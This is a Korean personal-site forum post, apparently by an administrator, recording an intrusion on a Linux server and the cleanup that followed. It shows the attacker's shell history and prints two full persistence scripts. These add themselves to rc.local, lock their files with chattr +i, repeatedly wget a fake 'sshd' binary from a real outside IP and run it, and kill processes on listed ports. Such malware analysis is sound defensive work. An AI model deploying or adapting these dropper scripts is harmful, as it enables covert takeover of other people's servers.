월간 인기 게시물

게시물 103건
   
.linux sshd
글쓴이 : 최고관리자 날짜 : 2015-08-07 (금) 02:41 조회 : 3537
글주소 :
                             

history
  117  2015-08-07_05:02:23\ ifconfig
  118  2015-08-07_05:02:30\ ss
  119  2015-08-07_05:02:37\ cd .ssh
  120  2015-08-07_05:02:40\ ls
  121  2015-08-07_05:03:25\ cat known_hosts
  .............................................
  .............................................
  130  2015-08-07_05:04:40\ cd /bin
  131  2015-08-07_05:04:50\ wget 168.235.251.156:2211/sshd
  132  2015-08-07_05:05:51\ wget 168.235.251.156:2211/.linux
  133  2015-08-07_05:06:26\ chmod +x sshd
  134  2015-08-07_05:06:30\ chmod +x .linux
  135  2015-08-07_05:06:34\ chattr +i .linux
  136  2015-08-07_05:06:39\ chattr +i sshd
  137  2015-08-07_05:06:45\ /bin/.linux &
  138  2015-08-07_05:06:47\ exit

정상 파일 속성
root@xxx:/bin# lsattr pwd
-------------e-- pwd

변경된 파일 속성
root@xxx:/bin# lsattr .linux 
----i--------e-- .linux
root@xxx:/bin# lsattr sshd 
----i--------e-- sshd

:: 수정
root@xxx:/bin# chattr -i .linux 
root@xxx:/bin# chattr -i sshd 
root@xxx:/bin# lsattr sshd 
-------------e-- sshd
root@xxx:/bin# lsattr .linux 
-------------e-- .linux


sshd 파일은 바이너리 파일 

root@xxx:/bin# cat  /bin/.linux
#!/bin/bash

if [ "/bin/.linux &" = "$(cat /etc/init.d/rc.local | grep /bin/.linux | grep -v grep)" ]; then
    echo ""
else
    echo "/bin/.linux &" >> /etc/init.d/rc.local
fi

while [ 1 ]; do
    sshd_killn=$(ps aux | grep "/bin/sshd" | grep -v grep | wc -l)
    if [[ $sshd_killn -eq 0 ]]; then
        if [ ! -f "/bin/sshd" ]; then
            if [ -f "/usr/bin/wget" ]; then
                cp /usr/bin/wget .
                chmod +x wget
                #./wget -P . http://168.235.251.156:2211/sshd
                ./wget -P /bin/  http://168.235.251.156:2211/sshd &> /dev/null
                chmod 755 /bin/sshd
                rm wget -rf
                kill [']netstat -nlp | grep :3699  | awk '{print $7}' | awk -F"/" '{ print $1 }'['];
                kill [']netstat -nlp | grep :10999 | awk '{print $7}' | awk -F"/" '{ print $1 }'['];
                kill [']netstat -nlp | grep :10777 | awk '{print $7}' | awk -F"/" '{ print $1 }'['];
                kill [']netstat -nlp | grep :10771 | awk '{print $7}' | awk -F"/" '{ print $1 }'['];
                kill [']netstat -nlp | grep :10711 | awk '{print $7}' | awk -F"/" '{ print $1 }'['];
                kill [']netstat -nlp | grep :36001 | awk '{print $7}' | awk -F"/" '{ print $1 }'['];
                kill [']netstat -nlp | grep :36000 | awk '{print $7}' | awk -F"/" '{ print $1 }'['];
                kill [']netstat -nlp | grep :45000 | awk '{print $7}' | awk -F"/" '{ print $1 }'['];
                kill [']netstat -nlp | grep :25000 | awk '{print $7}' | awk -F"/" '{ print $1 }'['];
                kill [']netstat -nlp | grep :25001 | awk '{print $7}' | awk -F"/" '{ print $1 }'['];
                kill [']netstat -nlp | grep :4201  | awk '{print $7}' | awk -F"/" '{ print $1 }'['];
                kill [']netstat -nlp | grep :55555 | awk '{print $7}' | awk -F"/" '{ print $1 }'['];
                kill [']netstat -nlp | grep :3699  | awk '{print $7}' | awk -F"/" '{ print $1 }'['];
                kill [']netstat -nlp | grep :2849  | awk '{print $7}' | awk -F"/" '{ print $1 }'['];
                  kill [']netstat -nlp | grep :2403  | awk '{print $7}' | awk -F"/" '{ print $1 }'['];
                  kill [']netstat -nlp | grep :34125 | awk '{print $7}' | awk -F"/" '{ print $1 }'['];
                  kill [']netstat -nlp | grep :2500  | awk '{print $7}' | awk -F"/" '{ print $1 }'['];
                  kill [']netstat -nlp | grep :2405  | awk '{print $7}' | awk -F"/" '{ print $1 }'['];
            else
                echo "No wget"
            fi
        fi
        /bin/sshd &
        #./sshd &
    elif [[ $sshd_killn -gt 1 ]]; then
        for killed in $(ps aux | grep "sshd" | grep -v grep | awk '{print $2}'); do
            sshd_killn=$(($sshd_killn-1))
            if [[ $sshd_killn -eq 1 ]]; then
                continue
            else
                kill -9 $killed
            fi
        done
    else
        echo ""
    fi

    sleep 200
done


root@xxx:/bin# cat /etc/linux
#!/bin/bash

if [ "/etc/linux &" = "$(cat /etc/init.d/rc.local | grep /etc/linux | grep -v grep)" ]; then
    echo ""
else
    echo "/etc/linux &" >> /etc/init.d/rc.local
fi

while [ 1 ]; do
    sshd_killn=$(ps aux | grep "/etc/sshd" | grep -v grep | wc -l)
    if [[ $sshd_killn -eq 0 ]]; then
        if [ ! -f "/etc/sshd" ]; then
            if [ -f "/usr/bin/wget" ]; then
                cp /usr/bin/wget .
                chmod +x wget
                #./wget -P . http://168.235.251.156:2211/sshd
                ./wget -P /etc/  http://168.235.251.156:2211/sshd &> /dev/null
                chmod 755 /etc/sshd
                rm wget -rf
            else
                echo "No wget"
            fi
        fi
        /etc/sshd &
        #./sshd &
    elif [[ $sshd_killn -gt 1 ]]; then
        for killed in $(ps aux | grep "sshd" | grep -v grep | awk '{print $2}'); do
            sshd_killn=$(($sshd_killn-1))
            if [[ $sshd_killn -eq 1 ]]; then
                continue
            else
                kill -9 $killed
            fi
        done
    else
        echo ""
    fi

    sleep 60
done


root@xxx:/bin# cat /etc/init.d/rc.local
......................
......................
/etc/linux &
/bin/.linux &


이름 패스워드
비밀글 (체크하면 글쓴이만 내용을 확인할 수 있습니다.)
왼쪽의 글자를 입력하세요.
   

 



 
사이트명 : 모지리네 | 대표 : 이경현 | 개인커뮤니티 : 랭키닷컴 운영체제(OS) | 경기도 성남시 분당구 | 전자우편 : mojily골뱅이chonnom.com Copyright ⓒ www.chonnom.com www.kyunghyun.net www.mojily.net. All rights reserved.